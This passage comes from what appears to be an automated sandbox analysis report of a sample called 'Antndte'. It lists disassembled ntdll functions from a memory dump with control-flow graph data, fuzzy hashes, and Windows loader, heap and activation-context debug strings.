                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 12e26d82786d7a7020400559766705639b34b8ef5b14df81a2f79396a1ac5615
                                                                                                                                • Instruction ID: 7df682d10c912b225607edb26d48ff37643e6cafffad92cd0f0f34e19304884d
                                                                                                                                • Opcode Fuzzy Hash: 12e26d82786d7a7020400559766705639b34b8ef5b14df81a2f79396a1ac5615
                                                                                                                                • Instruction Fuzzy Hash: C590023520140412D91061585D05646005647D0301F91DC56A0414618DC6648CE9B921
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357F4260 Relevance: .0, Instructions: 4COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 66014dc3386a7f7bec550eaa0468c97a801c053e090e06a030e077b97aa3f5c1
                                                                                                                                • Instruction ID: a5e1506de8d40a695e64a9f509ec51cee15960ef01a98993c77f66884f9991c7
                                                                                                                                • Opcode Fuzzy Hash: 66014dc3386a7f7bec550eaa0468c97a801c053e090e06a030e077b97aa3f5c1
                                                                                                                                • Instruction Fuzzy Hash: AF90023160580022954071584D85546401557E0301F91C856E0414614CCA248D9E6B61
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 3588A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 325 3588a1f0-3588a269 call 357c2330 * 2 RtlDebugPrintTimes 331 3588a41f-3588a444 call 357c24d0 * 2 call 357f4b50 325->331 332 3588a26f-3588a27a 325->332 334 3588a27c-3588a289 332->334 335 3588a2a4 332->335 337 3588a28b-3588a28d 334->337 338 3588a28f-3588a295 334->338 339 3588a2a8-3588a2b4 335->339 337->338 341 3588a29b-3588a2a2 338->341 342 3588a373-3588a375 338->342 343 3588a2c1-3588a2c3 339->343 341->339 344 3588a39f-3588a3a1 342->344 345 3588a2c5-3588a2c7 343->345 346 3588a2b6-3588a2bc 343->346 350 3588a2d5-3588a2fd RtlDebugPrintTimes 344->350 351 3588a3a7-3588a3b4 344->351 345->344 348 3588a2cc-3588a2d0 346->348 349 3588a2be 346->349 353 3588a3ec-3588a3ee 348->353 349->343 350->331 363 3588a303-3588a320 RtlDebugPrintTimes 350->363 354 3588a3da-3588a3e6 351->354 355 3588a3b6-3588a3c3 351->355 353->344 360 3588a3fb-3588a3fd 354->360 358 3588a3cb-3588a3d1 355->358 359 3588a3c5-3588a3c9 355->359 364 3588a4eb-3588a4ed 358->364 365 3588a3d7 358->365 359->358 361 3588a3ff-3588a401 360->361 362 3588a3f0-3588a3f6 360->362 368 3588a403-3588a409 361->368 366 3588a3f8 362->366 367 3588a447-3588a44b 362->367 363->331 373 3588a326-3588a34c RtlDebugPrintTimes 363->373 364->368 365->354 366->360 369 3588a51f-3588a521 367->369 370 3588a40b-3588a41d RtlDebugPrintTimes 368->370 371 3588a450-3588a474 RtlDebugPrintTimes 368->371 370->331 371->331 376 3588a476-3588a493 RtlDebugPrintTimes 371->376 373->331 378 3588a352-3588a354 373->378 376->331 383 3588a495-3588a4c4 RtlDebugPrintTimes 376->383 380 3588a356-3588a363 378->380 381 3588a377-3588a38a 378->381 384 3588a36b-3588a371 380->384 385 3588a365-3588a369 380->385 382 3588a397-3588a399 381->382 386 3588a39b-3588a39d 382->386 387 3588a38c-3588a392 382->387 383->331 391 3588a4ca-3588a4cc 383->391 384->342 384->381 385->384 386->344 388 3588a3e8-3588a3ea 387->388 389 3588a394 387->389 388->353 389->382 392 3588a4ce-3588a4db 391->392 393 3588a4f2-3588a505 391->393 394 3588a4dd-3588a4e1 392->394 395 3588a4e3-3588a4e9 392->395 396 3588a512-3588a514 393->396 394->395 395->364 395->393 397 3588a516 396->397 398 3588a507-3588a50d 396->398 397->361 399 3588a51b-3588a51d 398->399 400 3588a50f 398->400 399->369 400->396
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: HEAP:
                                                                                                                                • API String ID: 3446177414-2466845122
                                                                                                                                • Opcode ID: 8ff849bbaea91e620cce077c35dcae214c8c0dd3f18178bf64b3de1cd009f536
                                                                                                                                • Instruction ID: 993ba41a7ccdc007cdc6d68ef757e193a6022d714951a0c121d777dbc9df71db
                                                                                                                                • Opcode Fuzzy Hash: 8ff849bbaea91e620cce077c35dcae214c8c0dd3f18178bf64b3de1cd009f536
                                                                                                                                • Instruction Fuzzy Hash: 06A19B756183118FDB04CE28C894A6AB7E6FF88360F04456DED46DB3A1EB70EC46CB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357E7550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 401 357e7550-357e7571 402 357e75ab-357e75b9 call 357f4b50 401->402 403 357e7573-357e758f call 357be580 401->403 408 35824443 403->408 409 357e7595-357e75a2 403->409 413 3582444a-35824450 408->413 410 357e75ba-357e75c9 call 357e7738 409->410 411 357e75a4 409->411 417 357e75cb-357e75e1 call 357e76ed 410->417 418 357e7621-357e762a 410->418 411->402 415 35824456-358244c3 call 3583ef10 call 357f8f40 RtlDebugPrintTimes BaseQueryModuleData 413->415 416 357e75e7-357e75f0 call 357e7648 413->416 415->416 433 358244c9-358244d1 415->433 416->418 425 357e75f2 416->425 417->413 417->416 422 357e75f8-357e7601 418->422 427 357e762c-357e762e 422->427 428 357e7603-357e7612 call 357e763b 422->428 425->422 432 357e7614-357e7616 427->432 428->432 435 357e7618-357e761a 432->435 436 357e7630-357e7639 432->436 433->416 437 358244d7-358244de 433->437 435->411 438 357e761c 435->438 436->435 437->416 439 358244e4-358244ef 437->439 440 358245c9-358245db call 357f2b70 438->440 441 358245c4 call 357f4c68 439->441 442 358244f5-3582452e call 3583ef10 call 357fa9c0 439->442 440->411 441->440 450 35824530-35824541 call 3583ef10 442->450 451 35824546-35824576 call 3583ef10 442->451 450->418 451->416 456 3582457c-3582458a call 357fa690 451->456 459 35824591-358245ae call 3583ef10 call 3582cc1e 456->459 460 3582458c-3582458e 456->460 459->416 465 358245b4-358245bd 459->465 460->459 465->456 466 358245bf 465->466 466->416
                                                                                                                                Strings
                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 35824507
                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 35824530
                                                                                                                                • Execute=1, xrefs: 3582451E
                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 35824460
                                                                                                                                • ExecuteOptions, xrefs: 358244AB
                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 35824592
                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3582454D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                • API String ID: 0-484625025
                                                                                                                                • Opcode ID: fdda1084fc04480f58c791ef21db2b0d2a7c5dd2deb493a098188959339f4b4a
                                                                                                                                • Instruction ID: 2234a7b571b83d6b9e17667577db919d7163da3799757516241544d39bbe2941
                                                                                                                                • Opcode Fuzzy Hash: fdda1084fc04480f58c791ef21db2b0d2a7c5dd2deb493a098188959339f4b4a
                                                                                                                                • Instruction Fuzzy Hash: 8D51F675A043997AEB14DE95EC89FE977B9FF08344F4004E9D505AF180EB709E468FA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357CA170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 751 357ca170-357ca18f 752 357ca4ad-357ca4b4 751->752 753 357ca195-357ca1b1 751->753 752->753 754 357ca4ba-358177c8 752->754 755 358177f3-358177f8 753->755 756 357ca1b7-357ca1c0 753->756 754->753 759 358177ce-358177d3 754->759 756->755 758 357ca1c6-357ca1cc 756->758 760 357ca5da-357ca5dc 758->760 761 357ca1d2-357ca1d4 758->761 764 357ca393-357ca399 759->764 762 357ca1da-357ca1dd 760->762 763 357ca5e2 760->763 761->755 761->762 762->755 765 357ca1e3-357ca1e6 762->765 763->765 766 357ca1e8-357ca1f1 765->766 767 357ca1fa-357ca1fd 765->767 768 358177d8-358177e2 766->768 769 357ca1f7 766->769 770 357ca5e7-357ca5f0 767->770 771 357ca203-357ca24b 767->771 773 358177e7-358177f0 call 3583ef10 768->773 769->767 770->771 772 357ca5f6-3581780c 770->772 774 357ca250-357ca255 771->774 772->773 773->755 777 357ca39c-357ca39f 774->777 778 357ca25b-357ca263 774->778 779 357ca26f-357ca27d 777->779 780 357ca3a5-357ca3a8 777->780 778->779 782 357ca265-357ca269 778->782 784 357ca3ae-357ca3be 779->784 786 357ca283-357ca288 779->786 783 35817823-35817826 780->783 780->784 782->779 785 357ca4bf-357ca4c8 782->785 787 357ca28c-357ca28e 783->787 788 3581782c-35817831 783->788 784->783 789 357ca3c4-357ca3cd 784->789 790 357ca4ca-357ca4cc 785->790 791 357ca4e0-357ca4e3 785->791 786->787 796 35817833 787->796 797 357ca294-357ca2ac call 357ca600 787->797 792 35817838 788->792 789->787 790->779 793 357ca4d2-357ca4db 790->793 794 357ca4e9-357ca4ec 791->794 795 3581780e 791->795 798 3581783a-3581783c 792->798 793->787 799 35817819 794->799 800 357ca4f2-357ca4f5 794->800 795->799 796->792 804 357ca3d2-357ca3d9 797->804 805 357ca2b2-357ca2da 797->805 798->764 802 35817842 798->802 799->783 800->790 806 357ca2dc-357ca2de 804->806 807 357ca3df-357ca3e2 804->807 805->806 806->798 808 357ca2e4-357ca2eb 806->808 807->806 809 357ca3e8-357ca3f3 807->809 810 358178ed 808->810 811 357ca2f1-357ca2f4 808->811 809->774 813 358178f1-35817909 call 3583ef10 810->813 812 357ca300-357ca30a 811->812 812->813 814 357ca310-357ca32c call 357ca760 812->814 813->764 819 357ca4f7-357ca500 814->819 820 357ca332-357ca337 814->820 822 357ca521-357ca523 819->822 823 357ca502-357ca50b 819->823 820->764 821 357ca339-357ca35d 820->821 826 357ca360-357ca363 821->826 824 357ca549-357ca551 822->824 825 357ca525-357ca543 call 357b4428 822->825 823->822 827 357ca50d-357ca511 823->827 825->764 825->824 831 357ca3f8-357ca3fc 826->831 832 357ca369-357ca36c 826->832 828 357ca517-357ca51b 827->828 829 357ca5a1-357ca5cb RtlDebugPrintTimes 827->829 828->822 828->829 829->822 850 357ca5d1-357ca5d5 829->850 834 35817847-3581784f 831->834 835 357ca402-357ca405 831->835 836 358178e3 832->836 837 357ca372-357ca374 832->837 838 35817855-35817859 834->838 839 357ca554-357ca56a 834->839 835->839 840 357ca40b-357ca40e 835->840 836->810 841 357ca37a-357ca381 837->841 842 357ca440-357ca459 call 357ca600 837->842 838->839 844 3581785f-35817868 838->844 845 357ca414-357ca42c 839->845 846 357ca570-357ca579 839->846 840->832 840->845 847 357ca49b-357ca4a2 841->847 848 357ca387-357ca38c 841->848 860 357ca57e-357ca585 842->860 861 357ca45f-357ca487 842->861 852 35817892-35817894 844->852 853 3581786a-3581786d 844->853 845->832 854 357ca432-357ca43b 845->854 846->837 847->812 851 357ca4a8 847->851 848->764 855 357ca38e 848->855 850->822 851->810 852->839 859 3581789a-358178a3 852->859 857 3581787b-3581787e 853->857 858 3581786f-35817879 853->858 854->837 855->764 865 35817880-35817889 857->865 866 3581788b 857->866 864 3581788e 858->864 859->837 862 357ca489-357ca48b 860->862 863 357ca58b-357ca58e 860->863 861->862 862->848 867 357ca491-357ca493 862->867 863->862 868 357ca594-357ca59c 863->868 864->852 865->859 866->864 869 357ca499 867->869 870 358178a8-358178b1 867->870 868->826 869->847 870->869 871 358178b7-358178bd 870->871 871->869 872 358178c3-358178cb 871->872 872->869 873 358178d1-358178dc 872->873 873->872 874 358178de 873->874 874->869
                                                                                                                                Strings
                                                                                                                                • SsHd, xrefs: 357CA304
                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 358177E2
                                                                                                                                • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 358178F3
                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 358177DD, 35817802
                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35817807
                                                                                                                                • Actx , xrefs: 35817819, 35817880
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                • API String ID: 0-1988757188
                                                                                                                                • Opcode ID: 826f35724c0f1d4cb270904f1ce59a3d4649e606e158c56d90f434abda90b583
                                                                                                                                • Instruction ID: 70613e7d305d79310fa62d82f3a26587a5cf4a7c9259d7434eb6245ad7707fd7
                                                                                                                                • Opcode Fuzzy Hash: 826f35724c0f1d4cb270904f1ce59a3d4649e606e158c56d90f434abda90b583
                                                                                                                                • Instruction Fuzzy Hash: 10E1D3746083018FE715CF68C894B1AB7E2BB85365F504AADEC66CF290DB71DA85CB81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357CD690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 919 357cd690-357cd6cb 920 357cd907-357cd90e 919->920 921 357cd6d1-357cd6db 919->921 920->921 922 357cd914-35819139 920->922 923 35819164 921->923 924 357cd6e1-357cd6ea 921->924 922->921 930 3581913f-35819144 922->930 927 3581916e-3581917d 923->927 924->923 926 357cd6f0-357cd6f3 924->926 928 357cd6f9-357cd6fb 926->928 929 357cd8fa-357cd8fc 926->929 931 35819158-35819161 call 3583ef10 927->931 928->923 932 357cd701-357cd704 928->932 929->932 934 357cd902 929->934 933 357cd847-357cd858 call 357f4b50 930->933 931->923 932->923 936 357cd70a-357cd70d 932->936 934->936 939 357cd919-357cd922 936->939 940 357cd713-357cd716 936->940 939->940 942 357cd928-35819153 939->942 943 357cd71c-357cd768 call 357cd580 940->943 944 357cd92d-357cd936 940->944 942->931 943->933 949 357cd76e-357cd772 943->949 944->943 946 357cd93c 944->946 946->927 949->933 950 357cd778-357cd77f 949->950 951 357cd785-357cd789 950->951 952 357cd8f1-357cd8f5 950->952 953 357cd790-357cd79a 951->953 954 35819370-35819388 call 3583ef10 952->954 953->954 955 357cd7a0-357cd7a7 953->955 954->933 957 357cd80d-357cd82d 955->957 958 357cd7a9-357cd7ad 955->958 962 357cd830-357cd833 957->962 960 3581917f 958->960 961 357cd7b3-357cd7b8 958->961 964 35819186-35819188 960->964 963 357cd7be-357cd7c5 961->963 961->964 965 357cd85b-357cd860 962->965 966 357cd835-357cd838 962->966 970 358191f7-358191fa 963->970 971 357cd7cb-357cd803 call 357f8170 963->971 964->963 969 3581918e-358191b7 964->969 967 358192e0-358192e8 965->967 968 357cd866-357cd869 965->968 972 357cd83e-357cd840 966->972 973 35819366-3581936b 966->973 974 357cd941-357cd94f 967->974 975 358192ee-358192f2 967->975 968->974 976 357cd86f-357cd872 968->976 969->957 977 358191bd-358191d7 call 35808050 969->977 979 358191fe-3581920d call 35808050 970->979 993 357cd805-357cd807 971->993 980 357cd891-357cd8ac call 357ca600 972->980 981 357cd842 972->981 973->933 983 357cd874-357cd884 974->983 985 357cd955-357cd95e 974->985 975->974 982 358192f8-35819301 975->982 976->966 976->983 977->993 998 358191dd-358191f0 977->998 1003 35819224 979->1003 1004 3581920f-3581921d 979->1004 1000 35819335-3581933a 980->1000 1001 357cd8b2-357cd8da 980->1001 981->933 989 35819303-35819306 982->989 990 3581931f-35819321 982->990 983->966 991 357cd886-357cd88f 983->991 985->972 996 35819310-35819313 989->996 997 35819308-3581930e 989->997 990->974 1002 35819327-35819330 990->1002 991->972 993->957 999 3581922d-35819231 993->999 1006 35819315-3581931a 996->1006 1007 3581931c 996->1007 997->990 998->977 1008 358191f2 998->1008 999->957 1005 35819237-3581923d 999->1005 1009 357cd8dc-357cd8de 1000->1009 1010 35819340-35819343 1000->1010 1001->1009 1002->972 1003->999 1004->979 1011 3581921f 1004->1011 1012 35819264-3581926d 1005->1012 1013 3581923f-3581925c 1005->1013 1006->1002 1007->990 1008->957 1014 35819356-3581935b 1009->1014 1015 357cd8e4-357cd8eb 1009->1015 1010->1009 1016 35819349-35819351 1010->1016 1011->957 1019 358192b4-358192b6 1012->1019 1020 3581926f-35819274 1012->1020 1013->1012 1018 3581925e-35819261 1013->1018 1014->933 1017 35819361 1014->1017 1015->952 1015->953 1016->962 1017->973 1018->1012 1022 358192d9-358192db 1019->1022 1023 358192b8-358192d3 call 357b4428 1019->1023 1020->1019 1021 35819276-3581927a 1020->1021 1025 35819282-358192ae RtlDebugPrintTimes 1021->1025 1026 3581927c-35819280 1021->1026 1022->933 1023->933 1023->1022 1025->1019 1029 358192b0 1025->1029 1026->1019 1026->1025 1029->1019
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35819153
                                                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 3581914E, 35819173
                                                                                                                                • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 35819372
                                                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35819178
                                                                                                                                • GsHd, xrefs: 357CD794
                                                                                                                                • Actx , xrefs: 35819315
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                • API String ID: 3446177414-2196497285
                                                                                                                                • Opcode ID: 8168d3606204886fa76d8ce4e7114d6acb10700d1747f233759f5e3d53f75401
                                                                                                                                • Instruction ID: 5468cf5ffd7ed0bf8ddd91044573d3a1e402cd6e68d33a015df4bedd23e923a1
                                                                                                                                • Opcode Fuzzy Hash: 8168d3606204886fa76d8ce4e7114d6acb10700d1747f233759f5e3d53f75401
                                                                                                                                • Instruction Fuzzy Hash: 49E1C2746083819FE710CF14C884B4BB7F6BF88754F414AADE8968F281D771E985CB92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357A6565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35809885
                                                                                                                                • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35809843
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 35809854, 35809895
                                                                                                                                • LdrpLoadShimEngine, xrefs: 3580984A, 3580988B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 3446177414-3589223738
                                                                                                                                • Opcode ID: 389c7915d23694ff644920265c4a96d8606fe051e99e6b625cba50a4eeff37e8
                                                                                                                                • Instruction ID: c562f61646de2927a890841415845a79969cb9f5dcec76b4ff83edea4bd91610
                                                                                                                                • Opcode Fuzzy Hash: 389c7915d23694ff644920265c4a96d8606fe051e99e6b625cba50a4eeff37e8
                                                                                                                                • Instruction Fuzzy Hash: 2C51EF36B203589FDB14DBA8DC59FADB7B2BB44304F050265E811AF295DF70AC42CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 3585ECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3585EDE3
                                                                                                                                • Entry Heap Size , xrefs: 3585EDED
                                                                                                                                • HEAP: , xrefs: 3585ECDD
                                                                                                                                • ---------------------------------------, xrefs: 3585EDF9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                • API String ID: 3446177414-1102453626
                                                                                                                                • Opcode ID: 07086bb531cc49054e2d129dfa0993ac0280b0e43d47bb5b9ed05add5cd22143
                                                                                                                                • Instruction ID: 73cb9655979e8c066b0172136234c4173326e61df0440fe79a821140805731c0
                                                                                                                                • Opcode Fuzzy Hash: 07086bb531cc49054e2d129dfa0993ac0280b0e43d47bb5b9ed05add5cd22143
                                                                                                                                • Instruction Fuzzy Hash: 1241C439A10215DFCB05CF18D844A26BBF6FF4536472589E9D448AB321DB31FC42CB84
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357B9046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: $$@
                                                                                                                                • API String ID: 3446177414-1194432280
                                                                                                                                • Opcode ID: c7f9c1f2dd8ca244700d52d252e98434bd3fa797cf310ff09be8bfc9cfad28b9
                                                                                                                                • Instruction ID: 3946de387bc30a2cec72e51fc2b41e3f79558d0872a21c483a7b50759c2cb091
                                                                                                                                • Opcode Fuzzy Hash: c7f9c1f2dd8ca244700d52d252e98434bd3fa797cf310ff09be8bfc9cfad28b9
                                                                                                                                • Instruction Fuzzy Hash: 87811BB1D042699BDB21CF54CC45BDEB7B8AF48750F0041EAE91ABB250E7709E85CFA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357E4C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 35823439
                                                                                                                                • LdrpFindDllActivationContext, xrefs: 35823440, 3582346C
                                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 3582344A, 35823476
                                                                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 35823466
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                • API String ID: 3446177414-3779518884
                                                                                                                                • Opcode ID: be013405e54ef2249e28332eedfce07533eba64381521bc9671f1ade49575aca
